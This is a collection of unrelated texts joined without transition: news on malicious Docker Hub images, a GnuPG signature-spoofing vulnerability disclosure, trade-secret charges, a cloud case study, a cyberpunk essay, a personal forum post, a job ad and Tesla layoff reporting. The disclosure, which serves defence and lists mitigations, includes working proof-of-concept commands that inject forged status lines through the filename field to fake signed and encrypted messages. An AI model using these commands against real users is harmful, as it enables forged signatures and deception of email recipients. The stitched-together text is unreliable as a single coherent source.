A single person or group may have made as much as $90,000 over 10 months by spreading 17 malicious images that were downloaded more than 5 million times from Docker Hub, researchers said Wednesday. The repository finally removed the submissions in May, more than eight months after receiving the first complaint.

Docker images are packages that typically include a pre-configured application running on top of an operating system. By downloading them from Docker Hub, administrators can save huge amounts of set-up time. Last July and August one or more people used the Docker Hub account docker123321 to upload three publicly available images that contained surreptitious code for mining cryptocurrencies. In September, a GitHub user complained one of the images contained a backdoor.

Neither the Docker Hub account nor the malicious images it submitted were taken down. Over the coming months, the account went on to submit 14 more malicious images. The submissions were publicly called out two more times, once in January by security firm Sysdig and again in May by security company Fortinet. Eight days after last month's report, Docker Hub finally removed the images. The following image, provided by security firm Kromtech, shows the chronology of the campaign.

By the time Docker Hub removed the images, they had received 5 million “pulls.” A wallet address included in many of the submissions showed it had mined almost 545 Monero digital coins, worth almost $90,000.

The malicious image campaign, detailed in a blog post published Wednesday by security firm Kromtech, provides a cautionary tale for developers.

“For ordinary users, just pulling a Docker image from Docker Hub is like pulling arbitrary binary data from somewhere, executing it, and hoping for the best without really knowing what’s in it,” the researchers wrote.

They went on to warn that, despite the images being pulled from Docker Hub, many servers that installed the images may still be infected. The researchers also said that the malware may continue to run even after administrators think they’ve deleted the malicious image. Wednesday’s post includes the names of all 17 of the packages. Anyone who installed one should take time to analyze their computers for signs of infection.

2018-06-13 (Marcus Brinkmann)

GnuPG, Enigmail, GPGTools and potentially other applications using GnuPG can be attacked with in-band signaling similar tophreaking phone lines in the 1970s (“Cap’n Crunch”). We demonstrate this by creating messages that appear to be signed by arbitrary keys.

Previously, we showed how to spoof “encrypted” messages that were not actually encrypted. This time, we spoof “signed” messages that are not actually signed. And we show another way to spoof encryption, too.

This work would not have been possible without the collaboration withKai Michaelis onCVE-2012-12019 at the Bochumer hacker space Das Labor. Fabian Ising from FH Münster verified the attack against GPGTools, Simon Wörner helped with the CVE. Thanks also to all the other people who gave me guidance and support behind the scenes!

tl;dr

I found a severe vulnerability in GnuPG, Enigmail, GPGTools and python-gnupg:

CVE-2018-12020: The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a “--status-fd 2” option, which allows remote attackers to spoof arbitrary signatures via the embedded “filename” parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file.

If you are a user:

If you are a developer:

Identifiers

This vulnerability is tracked under the following identifiers:

Distributiuon updates for GnuPG:

Demonstrating the signature spoof

The screenshots below are from Enigmail and GPGTools, and apparently show a message with a valid signature (in the first case by Patrick Brunschwig, the Enigmail author). In reality, this message is an encrypted message without any signature at all.

Root cause: Status message injection through embedded filename

This method relies on synergy between two unrelated weak design choices (or oversights) in GnuPG 2.2.7 and some applications:

• Some applications call GnuPG with --status-fd 2 such that stderr and the status messages are combined in a single data pipe. These applications try to separate the output lines afterwards based on the line prefix (which is [GNUPG:] for status messages and gpg: for stderr).
• GnuPG, with verbose enabled (either directly on the command line or indirectly through the gpg.conf configuration file), prints the “name of the encrypted file” (an obscure feature of OpenPGP under the control of the attacker) to stderrwithout escaping newline characters.

The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key ids, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved.

The only limitation is that all status messages need to fit into 255 characters, which is the limit for the “name of the encrypted file” in OpenPGP.

Here is how to create a message that looks signed in Enigmail, but is not actually signed (replace VICTIM_KEYID by the desired recipient):

$ echo 'Please send me one of those expensive washing machines.' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

Analyzing the message with GnupG (with --verbose) leads to the following output:

$ cat poc1.msg | gpg --status-fd 2 --verbose
... (lots of output snipped) ...
gpg: original file name=''
[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>
[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B
[GNUPG:] TRUST_FULLY 0 classic
gpg: ''
[GNUPG:] PLAINTEXT 62 1528297411 '%0A[GNUPG:]%20GOODSIG%20DB1187B9DD5F693B%20Patrick%20Brunschwig%20<patrick@enigmail.net>%0A[GNUPG:]%20VALIDSIG%204F9F89F5505AC1D1A260631CDB1187B9DD5F693B%202018-05-31%201527721037%200%204%200%201%2010%2001%204F9F89F5505AC1D1A260631CDB1187B9DD5F693B%0A[GNUPG:]%20TRUST_FULLY%200%20classic%0Agpg:%20'
[GNUPG:] PLAINTEXT_LENGTH 56
... (more output snipped) ...

The application processes the output line by line:

• Lines starting with gpg: are ignored.
• GOODSIG will convince the application that the message is signed.
• VALIDSIG gives additional information about the signature, such as creation time, algorithm identifiers, and the long fingerprint.
• TRUST_FULLY indicates that the user trusts the key. This line may be omitted if the attacker knows that the recipient has not certified the spoofed signing key.

Normally, GnuPG emits many more status messages for a signed message, but applications usually do not pay much attention to those other messages, and do not fail if these are omitted.

Proof of concept II: Signature and Encryption spoof (Enigmail)

The attack is very powerful, and the message does not even need to be encrypted at all. A single literal data (aka “plaintext”) packet is a perfectly valid OpenPGP message, and already contains the “name of the encrypted file” used in the attack, even though there is no encryption.

As a consequence, we can spoof the encryption as well. But because we need to inject more status messages, we need to drop some information that is unused in the application to make more space for what is needed.

Here is an example for a message that looks signed and encrypted in Enigmail, but it is in fact neither. We use a shorter version ofVALIDSIG which is compatible with an older version of GnuPG that is still supported by Enigmail, and add just enough status messages to spoof an encrypted message for the signature.

echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

This is how this message is displayed in Enigmail (if verbose is enabled in gpg.conf):

There is one advantage to this method:

• The attacker does not need the public key of the recipient, only the key id.

There are some disadvantages, too:

• The message looks more suspicious under forensic analysis. For example, a virus scanner could be enabled to detect this attack.
• The victim might notice that they are able to view the message without providing a passphrase or security token.

Proof of concept III: Signature spoof on the command line

It is well known that email clients and other graphical user interfaces to GnuPG provide a larger attack surface than using GnuPG on the command line. For example, during the EFAIL vulnerability window, the EFF recommended to use the command line to read messages “in as safe a way as possible” on Linux,Windows andMacOS.

One of the few safe ways to verify signatures on the command line is documented in the “The GNU Privacy Handbook”:

To verify the signature and extract the document use the --decrypt option. The signed document to verify and recover is input and the recovered document is output.

blake% gpg --output doc --decrypt doc.sig
gpg: Signature made Fri Jun  4 12:02:38 1999 CDT using DSA key ID BB7576AC
gpg: Good signature from "Alice (Judge) <alice@cyb.org>"

Unfortunately, the attack might even work on the command line. Here we demonstrate how to get very close to spoofing signatures on the command line following the recommended decryption procedure, in a way that is portable across all operating systems and terminal types:

echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full] '\''msg'`" > poc3.msg

When reading the message, the victim sees the following output (if verbose is enabled in gpg.conf):

$ gpg --output poc3.txt -d poc3.msg 
gpg: original file name='msg'
gpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST
gpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677
gpg:                issuer "bill@eff.org"
gpg: Good signature from "William Budington <bill@eff.org>" [full] 'msg'
$ cat poc3.txt
meet me at 10am

The result is not a perfect match to the usual (no-verbose) output, but it is dangerously close. The main differences are:

• The first line indicates an “original file name”, which is uncommon. But the line shown is identical to a message which actually has a “original file name” of msg.
• The last line has an extra 'msg', because the attacker needs to hide the final apostrophe output by GnuPG. This is suspicious, but the victim might rationalise that by correlating this to theoriginal file name message.

A more sophisticated attack might use terminal capabilities to move the cursor and control the output color to hide some of these problems. This example works on terminals supporting ANSI/VT-100 escape sequences:

echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne \''\
\rgpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:\t\t    using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:\t\t    issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]\e[200C\e[1;37m'`"

Here we are using several advanced tricks:

• \r moves the cursor back to the beginning of the “original file name” line, allowing us to overwrite it.
• \e[200C pushes the single apostrophe 200 characters to the right, i.e. to the end of the line.
• \e[1;37m makes the single apostrophe bright white (assuming the user’s prompt will reset the color settings).

I have tried this on my standard terminal with the color scheme and prompt I use regularly, and although the terminal does distinguish “bright white” characters from the background color, the above approach hides the apostrophe quite well among the smudges on my screen:

Is verbose enabled?

By default, verbose is not enabled, but several recommended configurations for GnuPG include it, e.g. cooperpair sane defaults,Ultimate GPG Settings (viaSchneier’s Blog) and Ben’s IT-Kommentare. Export users might be interested in the additional details that verbose provides. And beginners might run into problems that require verbose to solve.

Some applications, such asEvolution, add --verbose to GnuPG invocations unconditionally, and a forward-thinking attacker could try to submit a “helpful patch” to Enigmail or GPGTools, adding --verbose to the list of command line options “to make debugging easier.”

Impact: Vulnerable applications and libraries

We have seen how to inject arbitrary status messages into applications using GnuPG to spoof signed and/or encrypted messages. The only assumptions we made were:

• The application using GnuPG calls it with --status-fd 2, which causes log and status messages to be interspersed on the same output channel.
• The --verbose setting is in effect when GnuPG is called, for example because verbose is included in the user’s gpg.conf configuration file for GnuPG.

We found that the following applications or libraries use --status-fd 2 and do not use --no-verbose, and thus are vulnerable to the attack if the user has verbose in gpg.conf:

Any software that calls gpg or gpgv with --status-fd 2 is potentially affected, unless it also adds --no-verbose.

Critical infrastructure at risk

The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git.

In the course of a due diligence investigation over two weeks to assess the impact of the vulnerability, I have found several near misses:

• Gnome Evolution, a popular email client, uses --verbose by default, but does use a status file descriptor separate fromstderr. So it is not vulnerable to this attack.
• Git verify-commit uses --status-fd 2 to create signatures, but it uses --status-fd 1 to verify (detached) signatures. Due to this happy circumstance it is not vulnerable to this attack.
• Likewise,Gemato, used in Gentoo to verify package signatures, also has --status-fd 1 to verify detached signatures, and is not vulnerable to this attack.
• Mutt config files for GnuPG support use --status-fd 2 and pattern matching, but add --no-verbose, too. Users with this configuration are not vulnerable to this attack.

If you use GnuPG in your application, you should verify that you are not affected, and consider some mitigations if you are.

Mitigations

For Users

For developers

• Upgrade to python-gnupg 0.4.3
• Call gpg with --no-verbose to disable the attack.
• Use a dedicated pipe for --status-fd, and do not share it withstderr.
• If this is not easy (or even possible) due to the framework or target platform, consider --batch --log-file FILE to redirect thestderr output, where FILE can be /dev/null, too. Thanks to Patrick Brunschwig for this idea!
• Or, the --status-file FILE option could be used to direct the status lines to a temporary file.

For GnuPG developers

• GnuPG should not emit the original file name log message (it is redundant with the PLAINTEXT status message).
• Instead of removing the log messages, GnuPG 2.2.8 at least properly escapes newline characters in the filename.
• GnuPG could check if stderr and the status fd are the same file descriptor, and abort operation in that case. This is a breaking change, but it will prevent similar problems in the future.

11 Jun 2018

• heise Security: Verschlüsselung: GnuPG verschärft Integritäts-Checks (Jürgen Schmidt) “Der Verfasser einer verschlüsselten E-Mail kann den Namen der enthaltenen Dateien recht frei festlegen. GnuPG versäumte es, die ausreichend zu checken; so konnte ein Angreifer unter anderem Zeilenumbrüche und Steuerzeichen einbetten, die GnuPG dann mit seinen Statusmeldungen mit ausgab. Auf diesem Weg konnte ein Angreifer einem Programm etwa eine erfolgreiche Signaturprüfung vorgaukeln.”

12 Jun 2018

13 Jun 2018

• golem.de: Signaturen fälschen mit GnuPG (Hanno Böck) “Eine Sicherheitslücke im Zusammenspiel von GnuPG und bestimmten Mailplugins erlaubt es unter bestimmten Umständen, die Signaturprüfung auszutricksen. Der Grund: Auf GnuPG aufbauende Tools und Mailplugins parsen die Ausgabe des Kommandozeilentools - und in die lassen sich unter Umständen gültig aussehende Statusnachrichten einschleusen.”

14 Jun 2018

If you like what you see, please support NeoPG development!

Bountysource

Become a Patreon

If you want to write code or documentation, join us onGitHub!

SAN JOSE – Six current and former Fitbit employees were charged in a federal indictment Thursday filed in San Jose for allegedly being in possession of trade secrets stolen from competitor Jawbone, according to information from the Department of Justice.

The indictment charges the six people — Katherine Mogal, 52, of San Francisco; Rong Zhang, 45, of El Cerrito; Jing Qi Weiden, 39, of San Jose; Ana Rosario, 33, of Pacifica; Patrick Narron, 41, of Boulder Creek; and Patricio Romano, 37, of Calabasas — with violating confidentiality agreements they had signed as former employees of Jawbone after they accepted employment with Fitbit, according to an announcement from Acting U.S. Attorney Alex G. Tse and Homeland Security Investigations Special Agent in Charge Ryan L. Spradlin.

Fitbit and Jawbone are competitors in making wearable fitness trackers, and both are based in San Francisco.

Each of the defendants worked for Jawbone for at least one year between May 2011 and April 2015, and had signed a confidentiality agreement with the company, according to the Department of Justice.

Some of the defendants received offers of employment from Fitbit while they still worked at Jawbone and quickly left Jawbone to work there, while one of them accepted employment from Fitbit months after resigning from Jawbone.

“Intellectual property is the heart of innovation and economic development in Silicon Valley,” Tse said in the news release. “The theft of trade secrets violates federal law, stifles innovation, and injures the rightful owners of that intellectual property.”

If convicted, the defendants face a maximum sentence of up to 10 years imprisonment and $250,000 fine per count, followed by a maximum three years supervised release, according to the news release.

“While we live in a free market economy, HSI is committed to ensuring employees are playing fair and within the limits of the law,” said Spradlin, who is the Special Agent in Charge for northern California and northern Nevada. “HSI has devoted more than two years to investigating these allegations of the theft of trade secrets. HSI considers these types of charges extremely serious, and is dedicated to safeguarding against any illegal corporate practices adversely impacting other businesses.”

Microsoft has a long history of working with the community to help improve OpenStreetMap . This includes being the first company to provide aerial imagery to the community for editing and, more recently, our release of almost ten million building footprints. We continue to have an interest in fostering a thriving and growing community of both contributors and users of OpenStreetMap.

This week Microsoft is integrating its Streetside imagery for the United States into iD, a popular web-based editor for contributing to OpenStreetMap. This is the same imagery currently visible on Bing Maps now embedded into a popular editing application initially developed and now maintained by Mapbox. Our aim is that it continues to encourage the community to contribute and improve OpenStreetMap.

The Streetside imagery covers more than 80% of the US population with 360 degree views. The massive imagery dataset covers approximately 1.6 million kilometers and takes nearly 5PB of storage! This imagery when viewed in conjunction with Bing imagery along with existing data in OpenStreetMap represents a significant increase in verifiable ground truth for OpenStreetMap contributors.

- Bing Maps Team

1. Extreme scalability. The game would be launched globally, so it needed backend that could scale with millions of players and still perform well.
2. Global network. Because the game allows real-time player versus player battles, it needs a reliable and low-latency network across regions.
3. Real-time data analytics. The game is designed to evolve with players in real-time, so it was critical to have a data analytics pipeline to stream data to a data warehouse. Then the operation team can measure and evaluate how people are playing the game and adjust it on-the-fly.

Let’s take a look at how BNE worked with Google Cloud to build the infrastructure for Dragon Ball Legends.

Challenge #1: Extreme scalability

While MySQL offers many advantages, it has one big limitation: scalability. Indeed, as a scale-up database if you want to increase MySQL performance, you need to add more CPU, RAM or disk. And when a single instance of MySQL can’t handle the load anymore, you can divide the load by sharding—splitting users into groups and assigning them to multiple independent instances of MySQL. Sharding has a number of drawbacks, however. Most gaming developers calculate the number of shards they’ll need for the database before the game launches since resharding is labor-intensive and error-prone. That causes gaming companies tend to overprovision the database to eventually handle more players than they expect. If the game is as popular as expected, everything is fine. But what if the game is a runaway hit and exceeds the anticipated demand? And what about the long tail representing a gradual decrease in active players? What if it’s an out-and-out flop? MySQL sharding is not dynamically scalable, and adjusting its size requires maintenance as well as risk.

In an ideal world, databases can scale in and out without downtime while offering the advantages of a relational database. When we first heard that BNE was considering MySQL sharding to handle the massive anticipated traffic for Dragon Ball Legends, we suggested they consider Cloud Spanner instead.

Why Cloud Spanner?

Evaluation to implementation

Game release

Long story short, BNE can focus on improving the game rather than spending time operating their databases.

Challenge #2: Global network

Why Cloud Networking?

Taking advantage of the Google Cloud Network

Challenge #3: Real-time data analytics

To gather this data, BNE used a combination of Cloud Pub/Sub, Cloud Dataflow to transform in users’ data in real-time and insert it into BigQuery.

• Cloud Pub/Sub offers a globally reliable messaging system that buffers the logs until they can be handled by Cloud Dataflow.
• Cloud Dataflow is a fully managed parallel processing service that lets you execute ETL in real-time and in parallel.
• BigQuery is the fully managed data warehouse where all the game logs are stored. Since BigQuery offers petabyte-scale storage, scaling was not a concern. Thanks to heavy parallel processing when querying the logs, BNE can get a response to a query, scanning terabytes of data in a few seconds.

Takeaways

Using Cloud Networking, they leveraged Google’s dedicated network to offer the best user experience to their fans, even when fighting across regions.

And finally, using Google’s analytics stack (Cloud PubSub, Cloud Dataflow and BigQuery), BNE was able to analyze players’ behaviors in near real-time and make decisions about how to adjust the game to make their fans even happier!

If you want to hear more details about how they evaluated and adopted Cloud Spanner for their game, please join them at their Google Cloud NEXT’18 session in San Francisco.

“Cyberpunk creeps up on us. Some kind of alchemy transforms its fictions into truths, and draws us towards places we thought unreal.”— @uttunul

Conventionally speaking, cyberpunk is a media genre. It brings to mind William Gibson’s Neuromancer. You fondly remember Blade Runner, and maybe Deus Ex or Ghost in the Shell. The phrase “high tech, low life” floats up from the back of your brain. You picture an exaggerated version of Hong Kong with a heavy dose of Rio de Janeiro’s favelas. You’re envisioning the Walled City of Kowloon plus lots of computers. Within tiny apartments, disheveled vigilante hackers stare at their screens, busily infiltrating the databases of megacorps.

Illustration by Grace Witherell

But perhaps you’ve also noticed that cyberpunk plot points are turning up in real life. Robot security guards patrol shopping malls. A near-billionaire startup founder sees virtual reality as salvation for the downtrodden global poor. San Francisco’s Tenderloin district is flush with VC money and homeless drug addicts at the same time. And speaking of those vigilante hackers, they’re here in our reality too, pwning companies of all sizes. Some state-sponsored ones like to meddle in foreign politics. It’s all very exciting! Only plutocrats and nouveau mafiosos can avoid feeling uneasy.

Cyberpunk examines the way computing changes power relationships. Asymmetric information warfare has become the norm, as foretold by our pulpy sci-fi prophets. The technological changes that have been snowballing over the past fifty years now mean that anyone can talk to anyone, anywhere, with their identity hidden or not. Edward Snowden can stroll away from his NSA job with a priceless cache of secret documents that detail the crimes of an empire, then escape across continents in a matter of days, to hole up with a rival regime.

So, why bother with any of this if you don’t intend to commit espionage?

A Suspicious Lens

Elements of our reality correspond to elements of fictional ones, sure. But I’m not saying that we live in a cyberpunk world. Rather, we live in a world that can be productively viewed through a cyberpunk lens. The difference is subtle but important — cyberpunk is the map, not the territory. I look at it as a mental model with which to interpret the near-past and near-future.

As Susan Sontag describes:

“[T]aste governs every free — as opposed to rote — human response. Nothing is more decisive. There is taste in people, visual taste, taste in emotion — and there is taste in acts, taste in morality. Intelligence, as well, is really a kind of taste: taste in ideas. […] Taste has no system and no proofs. But there is something like a logic of taste: the consistent sensibility which underlies and gives rise to a certain taste.”

Cyberpunk is a type of “taste in ideas” that weds aesthetics with politics. It is not a framework with a specific hypothesis or clearly defined rules. Rather, cyberpunk is an assemblage of loosely related themes, tropes, and aesthetics. Viewing the arc(s) of history through this cyberpunk lens helps highlight certain trends as being worth paying attention to. Noticing the moments of techno-dystopia in our world can jolt people awake, causing them to realize how computing — especially the internet — is impacting their lives on every scale.

The events or ideas that trigger the mental switch-flip are usually exotic, like crime-deterring robots, but the deeper level of using the cyberpunk mental model is looking at mundane things like commerce and subculture formation and seeing how computers and the internet change the dynamics that we used to be used to.

Tech-biz analyst Ben Thompson wrote on his blog, in 2013:

“[I]f there is a single phrase that describes the effect of the Internet, it is the elimination of friction. [¶] With the loss of friction, there is necessarily the loss of everything built on friction, including value, privacy, and livelihoods. […] Count me with those who believe the Internet is on par with the industrial revolution, the full impact of which stretched over centuries. And it wasn’t all good. Like today, the industrial revolution included a period of time that saw many lose their jobs and a massive surge in inequality. It also lifted millions of others out of sustenance farming.”

Our new technologies have fractal effects that can be observed on global levels, societal levels, and individual levels. Consider the environmental effect of high-tech manufacturing; consider conflict minerals going into so many laptops; consider the effect the ubiquity of smartphones has on geopolitical discourse; on national discourse. Consider where the American stock market would be without big tech companies. Consider where you would be.

Asymmetric Seismic Upheaval

Let’s say you’ve been observing the United States election. Whether you want to or not, you probably haven’t been able to escape this topic entirely. And let’s say you’re worried about “white genocide”. Next step: start a pseudonymous Twitter account.

“Neil [Turner]’s profile picture was a pouty mirror selfie of a skinny white kid, wearing what was clearly a Photoshopped ‘Make America Great Again’ hat. The self-proclaimed warrior against #PoliticalCorrectness and #WhiteGenocide claimed to be from Mississippi, maintained a healthy 20-something-thousand followers and had been mentioned in publications like Fortune for his hateful, white supremacist commentary on Twitter. But most notably, he was often the first to reply to tweets from Donald Trump and Hillary Clinton — a historically coveted, high-exposure spot in online social networks and comments sections.”

Spoiler alert: he used a bot to automate responses. This is very cyberpunk. Whoever “Neil Turner” really is, he brilliantly leveraged computing to take advantage of presidential candidates’ publicity. Now instead of being just another Twitter troll, ignored by most, he has thousands and potentially millions of eyes on his thoughts.

Activists in other political conflicts have also used the ubiquity of digital technologies to flip or push back on analog power differentials. Mahmoud Salem, a participant in Egypt’s 2011 Arab Spring uprising, wrote in World Policy Journal:

“Blogs become a means for mass protest. Facebook fuelled further organization, and with the advent of Twitter in 2007, protesters could communicate and document their often-tumultuous journeys in 140-characters or less. In short, by January 2011 there was a well-established network of tools for revolutionaries to employ in their struggle to modernize Egypt.”

America’s #BlackLivesMatter movement has flourished on social media. Their grievances have been substantiated as video after video circulates on various platforms, putting extrajudicial police killings on a loop for an audience of all races. Protest organizing takes place via hashtag and DM. Twitter in particular is a hotspot because of its public nature, but Philando Castile’s girlfriend Lavish Reynolds livestreamed him bleeding out on Facebook.

Of course, large institutions have access to the same tools. A company called Geofeedia harvested data from social media sites to help police pinpoint protesters. Facebook, Instagram, and Twitter cut off Geofeedia’s API access, but Geofeedia was not the only tool of its kind. Facebook itself took town the video of Castile’s ordeal, then claimed this action was a “glitch” after being widely chastised.

How many videos has Facebook removed that were then forgotten for lack of public outcry?

Protesters’ advantage is their ability to take over the news cycle, simultaneously in every part of a given country, because the internet means information travels instantaneously. Many of us have smartphones that ding us every time something new develops. “Did you see… ?!”

But the police and other fiat institutions have the same advantage they’ve always had — the ability to lock people up, sometimes justified but often not. What’s new to the law enforcement arsenal is being able to sort and target high-impact targets at scale.

A project by Georgetown Law’s Center on Privacy & Technology recently released “Perpetual Line Up”, a report on US law enforcement’s massive facial recognition databases, noting that “at least five major police departments — including agencies in Chicago, Dallas, and Los Angeles — either claimed to run real-time face recognition off of street cameras, bought technology that can do so, or expressed a written interest in buying it.”

A less political example is the infamous saga of Silk Road, a libertarian “Dark Web” drug marketplace run by a man who called himself Dread Pirate Roberts. Investigative journalist Joshuah Bearman chronicled Silk Road’s rise and fall for Wired, and it’s a remarkable story.

For years, Ross Ulbricht (DPR’s real name) was able to hide his various whereabouts by using the anonymous web browser Tor (which is ironically mainly funded by the US government) and bitcoin; he could run his platform remotely without ever outing his legal identity. Eventually an IRS agent working with the FBI found the clue that unraveled Ulbricht’s anonymity, by combing through old forum postings, cross-referencing usernames. When he first launched Silk Road and wanted to promote the marketplace, Ulbricht made the mistake of using a handle that could be tied back to him.

Again, see the interplay of power: an individual enables anonymous drug smuggling through the legal mail, and the government uses its manpower to comb through the digital detritus this individual was not savvy enough to hide.

Of course, these kinds of power gradients are not unique to a world with computers. Activists and the police using social media to fight each other is not so different from communist pamphlets and leftist magazines, met with McCarthyism and calculated subversion. (Take a look at the CIA’s ties to the Iowa Writers Workshop, or the FBI’s interference with the Black Panthers.) The story of Ross Ulbricht’s capture has parallels to 1920s and ‘30s gangster-hunts, or efforts to round up New York mob families throughout the twentieth century.

However, the world with computers makes it easier. What computers are really good at is brute-force math and copying things perfectly. They do those things very, very quickly. A few simple capabilities have been built up into myriad programs, and ultimately programmers’ work has transformed our everyday lives.

Tradeoffs of the Cognitive Underbelly

The cyberpunk mental model has a lot of predictive power because it heavily weights the influence of computing, but it can be risky because it’s quite cynical and pessimistic. We expect the worst of people. Cyberpunk is not an outright basilisk, but it can drive the mind toward paranoia. I’ve received some perturbing emails.

Fundamentally, the danger is that mental models are the enemy of complexity. They’re useful as sources of decision-making heuristics, shortcuts that guide you in reacting to new developments. This is just a thing that human brains need because contemplating every single occurrence and choice in depth is mentally taxing.

The internet enables more individual opportunity than ever before — how would my words manage to reach you otherwise? And the internet is more meritocratic than the landscape it took over, because anyone can distribute their own work to a potential audience of millions, but of course age-old power dynamics can’t be erased in one fell swoop. It also enables winner-take-all businesses, like Amazon’s dominance in ecommerce and Facebook’s reign over news media.

These companies obviously aren’t pure monopolies with no competitors at all, but they have massive and ever-increasing mindshare (hence wallet-share as well). Their overwhelming advantage comes from the way the internet has upended distribution — any company can reach any person. Like Ben Thompson said, the friction is gone. Hence a given company’s addressable market is limited only by old-world logistics (e.g. getting people online, hence initiatives like Zuckerberg’s much-maligned Internet.org, or Google’s dilemma in being unable to bypass China’s Great Firewall).

When your audience is the whole world, the flip side is that each consumer can choose whoever they want. They choose the highest quality — Google — or the most convenient — Amazon — or the one with network effects — Facebook. And that leads to One Giant Winner who amasses lots of power. On balance, it’s usually a good thing, but that doesn’t mean there are no negative effects.

Globalization in general has incensed a demographic close to home, as Nils Gilman chronicled for The American Interest:

“For the traditional working classes, gone are not only jobs but also the wellsprings of traditional forms of social esteem, replaced with a blighted landscape of deindustrialization, drug addiction, and elite disdain. To be sure, African-Americans have been experiencing this sort of social devastation forever; what is new is whites experiencing the same, while at the same time being denied the traditional consolation prize of elite-sanctioned ethno-racial supremacism.”

Economic upheaval always has profound cultural effects. Cyberpunk highlights the power of vigilante hackers, sure, but it also points to the power of institutions, whether stultified or moving fast and breaking things. The balance between these two types of entities is what’s fascinating and crucial to watch.

I know what it is to be in the dark cycle of bipolar. Last week, some personal issues triggered me to go from highly optimistic to extremely pessimistic.

I don't know how to tell my employer that my mind in in another planet right now. I might loose might job since it has been 4 days I do not work (2 sick, 2 because of this).

The company is based in the US but fully remote. I am under a contract (and I am not US citizen), while values and culture is something that seemed to be important, recent weeks had been lots of changes and drama inside that I don't think anyone would be able to put even themselves in my place.

I am burnt out. Personally and professionlly. I am under therapy and well surrunded. But just need a week break.

Last but not least, the company has a "unlimited vacation policy" and they say they force employees to go into vacation. In my last year, no one told me how or when. I think because some internal problems that we need ship fast and soon (or company might go bankrupt) they forgot this, which is not helping.

Should I just ask for vacation in the middle of the fire that we have inside? (I would look terrible to my co-workers/team) Should I disclose I have bipolar? if so, how?

I personally don't think anyone how is unfamiliar with bipolar disorder has any idea how hard life can turn. Even the most mundane task, turns into a hell.

Thank you

The team at Tenjin is small but we are growing. All of us feel passionately about doing work that matters and our vision is to create a fundamental shift in the way mobile marketing is done throughout the mobile app industry. Working at Tenjin will provide you with many opportunities for growth and leadership in addition to working at the cutting edge intersection of data and mobile marketing. If you’re looking to work in an exciting environment with smart, talented people who value good people and good ideas, we’d like to talk to you.

We are reshaping the mobile marketing landscape by breaking down data silos and building up an integrated data platform to replace the disparate, a la carte services in use today. We manage mobile growth infrastructure for our clients, dynamically managing and organizing the deluge of data generated by mobile devices and marketing channels.

While remaining focused, driven and ambitious, we don’t take ourselves too seriously. We enjoy great food, great company, and great coffee (all of which are provided for free!). We believe everyone here at Tenjin has the ability to contribute great things and we enjoy learning from each other every day. Team players who are also self-directed achievers will enjoy the balance of flexibility and collaboration that is an important part of the work culture at Tenjin.

• On Tuesday, Tesla said it was firing around 9% of its employees.
• Former employees told Business Insider they were surprised by the layoffs.
• In May, Musk said the company would restructure operations to boost profitability, though he didn't discuss specific layoff plans.

This week, Tesla is firing around 9% of its employees in an effort to cut costs and eliminate redundancies, CEO Elon Musk said in an email to employees he shared on Twitter.

The move came as a surprise to some employees, who told Business Insider they were given no advance notice about the possibility of being fired. During Tesla's first-quarter earnings call in May, Musk said the company would restructure operations to boost profitability. At the time, he said the company would review its third-party contractors, though he didn't discuss specific plans to layoff company employees.

One former employee thinks more layoffs are coming

A former Tesla Energy salesperson who asked not to be identified by name said her team received an email at 1 a.m. on Tuesday morning asking them to clear four hours in their schedule that day for a video conference. The video conference turned into a conference call with a human-resources employee and Brent Baldwin, the company's director of energy sales.

During the call, 250 people, including the energy sales employee's entire training class, learned they would be let go, and Baldwin apologized for having to fire salespeople who had hit their quotas, the former energy salesperson said. Despite the apology, the former energy salesperson said she and her training class were made to feel as if they had failed the company.

"font-weight: 400;">Musk said in an email on Monday that the company was laying off people now so& that it would never have to do it again.

But the former employee said she believes this round of layoffs won't be the last.

"My theory is that this is the first wave. I don't think there will be enough business for the staff levels that they have," she said. "I would be scared to lose my job if I still had one.

The former employee started at Tesla in January and said she had to work nights and weekends to hit her quota while dealing with a shifting commission structure that made it more difficult to hit her goals.

"Honestly, since I started with this company it's been nothing but a disaster," she said.

The company broke promises more than once, she said, adding that she was not reimbursed for mileage, as promised, and never received any company apparel. Tesla also didn't mark out sales territory, so she would run into her coworkers in her region, she said.

